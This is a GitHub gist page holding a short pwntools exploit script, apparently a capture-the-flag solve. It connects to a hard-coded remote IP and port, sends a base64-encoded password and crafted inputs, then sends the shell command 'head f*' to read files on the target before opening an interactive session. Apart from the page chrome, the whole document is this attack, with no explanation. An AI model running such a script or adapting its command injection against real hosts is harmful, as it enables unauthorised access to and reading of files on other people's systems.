Skip to content

Instantly share code, notes, and snippets.

@junorouse
Last active April 24, 2017 05:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save junorouse/1fac00fa6436c0da7173d062742f1f45 to your computer and use it in GitHub Desktop.
Save junorouse/1fac00fa6436c0da7173d062742f1f45 to your computer and use it in GitHub Desktop.
from pwn import *
r = remote("110.10.212.138", 19091)
r.sendline("TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA")
r.sendline("YQ==")
r.sendline("YQAAAAA=")
r.sendline("head f*".encode("base64"))
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment